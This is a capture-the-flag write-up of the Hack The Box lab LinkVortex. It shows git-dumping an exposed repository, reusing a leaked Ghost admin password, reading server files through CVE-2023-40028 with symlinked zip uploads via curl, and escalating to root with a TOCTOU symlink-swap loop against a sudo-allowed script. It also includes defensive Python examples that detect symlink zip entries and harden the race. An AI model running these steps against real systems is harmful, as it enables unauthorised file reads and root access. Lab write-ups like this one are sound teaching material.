Enumeration
The first scan with NMAP shows port 80 redirecting to the address http://linkvortex.htb. For DNS resolution, add the IP and hostname to the /etc/hosts file.
nmap -Pn -T4 -sC -sV [IP]
With correct DNS resolution, I can access the site.
The next step was a directory scan, where I found the files robots.txt and sitemap.xml.
The file robots.txt reveals an administrative interface at http://linkvortex.htb/ghost/#/signin. A new scan of the /ghost directory was performed without significant results.
FFUF Subdomain Discovery
The tool FFUF can be used for subdomain discovery. This technique modifies the Host header of the HTTP request, for example -H "Host: TESTE.domain", and filters out the default response (here the 301 redirect) to spot virtual hosts that answer differently.
ffuf -u http://[URL] -H "Host: TESTE.linkvortex.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:TESTE -fc 301
The subdomain dev.linkvortex.htb was discovered.
On dev.linkvortex.htb I didn't find any relevant result, so I used DIRSEARCH for a new scan and discovered an exposed .git directory.
Command: dirsearch -u http://dev.linkvortex.htb/
The .git directory is a hidden directory created when a repository is initialized (git init) or cloned (git clone).
This directory stores all the metadata and objects needed for version control, including:
🔹 Commit history (objects that record snapshots of the project over time).
🔹 Branches and tags.
🔹 Staging area (index), where the files prepared for the next commit are located.
🔹 Repository configuration (.git/config).
🔹 Remote references (information about origin, etc.).
🔹 Git objects (compressed files such as blobs, trees and commits).
I previously wrote an article about a similar scenario, where I used the tool git-dumper to download the files.
Command: python3 git_dumper.py http://dev.linkvortex.htb [directory]
Right away, I executed git diff --cached to see the changes staged for the next commit (git commit).
I tried to log in with the credentials I found, and it didn't work. I also tried the credentials found in the log file, and it still didn't work. In both cases, the application reported that the user doesn't exist.
But login worked with the username admin@linkvortex.htb and the password OctopiFociPilfer45.
The Ghost CMS version is 5.58, which has a public exploit available.
In the exploit, the vulnerable path is /ghost/api/v3/admin/db/. The first access automatically downloads a file named bitbybit-hardware, but there is no important information in it; it only confirms the Arbitrary File Read vulnerability.
The exploit consists of importing a zip file containing a symbolic link to internal files on the server, such as /etc/passwd. The zip file is imported to the path /content/images/2024/, and I looked for this directory in the .git repository downloaded earlier.
In my case, there was no 2024 folder, so I don't know why the exploit imports the zip file to this specific location.
Manually, I created an "image" that is a symbolic link to /etc/passwd:
ln -s /etc/passwd teste.png
After creating the image with the symbolic link, I made a zip file (the -y option stores the symbolic link itself instead of the file it points to):
zip -y -r test.zip .
As explained in another article, the vulnerability can be exploited manually with a curl request:
curl -X POST "http://linkvortex.htb/ghost/api/admin/db" -F "importfile=@test.zip" -b 'ghost-admin-api-session=s%3ACxASttgx4o84jItS-rTGEurS5w9LVi4U.d3tFak8ozgkFe0Xr2AQMeJAWu0HAWP1Vbsg5N2Fu1f4'
The result of the import request is the content of /etc/passwd. First I perform the import [1], then I access /content/images/ [2], where the image with the symbolic link is stored.
Great! But to complete this lab, HTB asks for Bob's password. So I searched the .git directory for e-mails like @linkvortex.htb with the command grep -r '@linkvortex.htb', but didn't find a credential.
Previously, the output of git diff --cached showed a copy of config.production.json for the path /var/lib/ghost/config.production.json. I used the vulnerability (CVE-2023-40028) to read this file.
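A defensive counterpart to the import step above, added here and not taken from the original post or from Ghost: before extracting an uploaded archive, inspect each zip entry's recorded Unix mode and refuse the archive when any entry is a symbolic link. The sample archive is constructed in memory, and the function names and rejection policy are my own.

```python
import io
import stat
import zipfile

# Added example, not code from the original post or from Ghost. Info-ZIP (`zip -y`)
# stores the Unix mode of each entry in the upper 16 bits of external_attr, so a
# symbolic-link entry can be recognised before anything is extracted.

def entry_is_symlink(info):
    """True when the entry's recorded Unix mode says it is a symbolic link."""
    mode = (info.external_attr >> 16) & 0xFFFF
    return stat.S_ISLNK(mode)

def find_symlink_entries(data):
    """Return (entry name, link target) for every symlink entry in the archive."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if entry_is_symlink(info):
                # For a symlink entry the stored body is the link target, not file data.
                found.append((info.filename, zf.read(info).decode("utf-8", "replace")))
    return found

def is_safe_to_import(data):
    """Policy for an importer: refuse the whole archive if any entry is a link."""
    return not find_symlink_entries(data)

def build_sample_zip(with_symlink=True):
    """Constructed archive: one real PNG header and, optionally, a 'test.png' that
    is a link to /etc/passwd, as produced by `ln -s /etc/passwd test.png; zip -y`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("content/images/real.png", b"\x89PNG\r\n\x1a\n")
        if with_symlink:
            link = zipfile.ZipInfo("content/images/test.png")
            link.create_system = 3                       # 3 = Unix
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, "/etc/passwd")
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_zip()
    for name, target in find_symlink_entries(sample):
        print(f"REJECT {name}: symbolic link to {target}")
    print("safe to import:", is_safe_to_import(sample))          # False
    print("clean archive safe:", is_safe_to_import(build_sample_zip(False)))  # True
```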
Steps:
1 - Create an image with a symbolic link to /var/lib/ghost/config.production.json
ln -s /var/lib/ghost/config.production.json exploit.png
2 - Create a zip file, using the -y option so the symbolic link is stored as a link rather than replaced by its target
3 - Import the zip file. The curl option -F with the parameter "importfile=@exploit.zip" performs the upload
curl http://linkvortex.htb/ghost/api/admin/db -F "importfile=@exploit.zip" -b 'ghost-admin-api-session=s%3ACxASttgx4o84jItS-rTGEurS5w9LVi4U.d3tFak8ozgkFe0Xr2AQMeJAWu0HAWP1Vbsg5N2Fu1f4'
4 - Finally, access the path /content/images where the malicious file was imported
curl -b 'ghost-admin-api-session=s%3ACxASttgx4o84jItS-rTGEurS5w9LVi4U.d3tFak8ozgkFe0Xr2AQMeJAWu0HAWP1Vbsg5N2Fu1f4' http://linkvortex.htb/content/images/exploit.png
config.production.json contains an SMTP configuration, where I found Bob's credentials.
The server has an SSH service and Bob has access to it.
For privilege escalation in this lab, Bob is allowed to run the script /opt/ghost/clean_symlink.sh as root.
I read this script to understand its function.
This Bash script is a security measure against malicious symbolic links in .png files. It checks whether a .png file is a real image or a symbolic link. If the file is a symbolic link, its target path is checked:
- If the link points to a critical path such as /etc or /root, the file is removed immediately
- Otherwise the file is treated as a real image and moved to the quarantine directory at /var/quarantined
Optionally, the script displays the file's content if the variable CHECK_CONTENT=true.
For privilege escalation, I can exploit a TOCTOU race to change the link between the check step and the use step of clean_symlink.sh.
A TOCTOU vulnerability is a class of race-condition vulnerabilities that occur when a program checks some property of a resource (time-of-check) and later uses the resource (time-of-use) assuming the property still holds, but an attacker changes the resource in the small time window between check and use. The result: the program acts on a different resource than it intended.
Filesystem: the typical example is access()/stat() followed by open(), with a symlink swap or file replacement between the calls.
That is exactly what I can do: swap my image symbolic link between the check and the use in clean_symlink.sh. If successful, the content of the file my malicious link points to is displayed.
A great explanation:
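To make the race concrete, here is an added Python example (not the lab's clean_symlink.sh) that reproduces the check-then-use pattern in a temporary directory, with a hook standing in for the attacker's loop, beside a race-free version that opens the quarantined file once with O_NOFOLLOW and reads through the descriptor. The hardened version deliberately adopts a stricter policy than the script: a quarantined file is read only if it is not a link at all.

```python
import os
import tempfile

# Added example, not the lab's clean_symlink.sh. These are the prefixes the script refuses.
BLOCKED_PREFIXES = ("/etc/", "/root/")

def vulnerable_scan(png, quar_dir, between=lambda: None):
    """Time-of-check: inspect the link target. Time-of-use: read the moved file."""
    target = os.readlink(png) if os.path.islink(png) else png
    if target.startswith(BLOCKED_PREFIXES):
        os.remove(png)
        return None                      # flagged and deleted
    dest = os.path.join(quar_dir, os.path.basename(png))
    os.rename(png, dest)                 # quarantine
    between()                            # race window: dest may be replaced here
    with open(dest) as fh:               # follows whatever dest points at *now*
        return fh.read()

def hardened_scan(png, quar_dir, between=lambda: None):
    """Open once with O_NOFOLLOW and read via that descriptor: links are never followed."""
    dest = os.path.join(quar_dir, os.path.basename(png))
    os.rename(png, dest)
    between()
    try:
        fd = os.open(dest, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:                      # ELOOP: dest is a symlink, refuse it
        os.remove(dest)
        return None
    try:
        return os.read(fd, 1 << 16).decode()
    finally:
        os.close(fd)

def demo(scan):
    """Constructed scenario: a .png linking to a harmless file passes the check, then
    the 'attacker' swaps the quarantined entry for a link to a secret file."""
    with tempfile.TemporaryDirectory() as d:
        secret, harmless = os.path.join(d, "root.txt"), os.path.join(d, "bashrc")
        quar = os.path.join(d, "quarantined")
        os.mkdir(quar)
        for path, text in ((secret, "constructed-secret-flag\n"), (harmless, "harmless\n")):
            with open(path, "w") as fh:
                fh.write(text)
        png = os.path.join(d, "toctou.png")
        os.symlink(harmless, png)        # not under /etc or /root, so it passes the check
        dest = os.path.join(quar, "toctou.png")
        def attacker():                  # stands in for the `while true; do ln -sf ...` loop
            os.remove(dest)
            os.symlink(secret, dest)
        return scan(png, quar, between=attacker)
```

Calling demo(vulnerable_scan) returns the secret's content, while demo(hardened_scan) returns None and deletes the swapped link.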
"If I can run a command between the time that it checks the target of the link and when it prints the contents of the file, I can change the target of the link.
When the link is checked, it’s in the original location pointing at a dummy non-flagged value. Then if it passes the scan, it is moved to $QUAR_DIR, and then the contents are printed. I’ll have a continuous loop looking for the file I want in $QUAR_DIR and overwriting it, hoping that I can do so before the contents are read."
Command: while true; do ln -sf /root/root.txt /var/quarantined/toctou.png; done
The -f option forces overwriting if the file already exists.
First I started a loop that keeps creating the symbolic link /var/quarantined/toctou.png pointing to /root/root.txt. Then I created a symbolic link to the file .bashrc as the image toctou.png in the directory /dev/shm:
ln -s /home/bob/.bashrc /dev/shm/toctou.png
List the link with the command: ls -l /dev/shm/toctou.png
Finally, I executed clean_symlink.sh against my image toctou.png in /dev/shm. The script validated the image and moved it to the /var/quarantined directory, and because the loop had replaced it with a symbolic link to /root/root.txt, the content of that file was displayed.
CHECK_CONTENT=true sudo bash /opt/ghost/clean_symlink.sh /dev/shm/toctou.png
Content of /root/root.txt
This lab demonstrated exploitation of CVE-2023-40028 and of a TOCTOU vulnerability, a technique that changes the target of a link during execution.
#HACKINGBR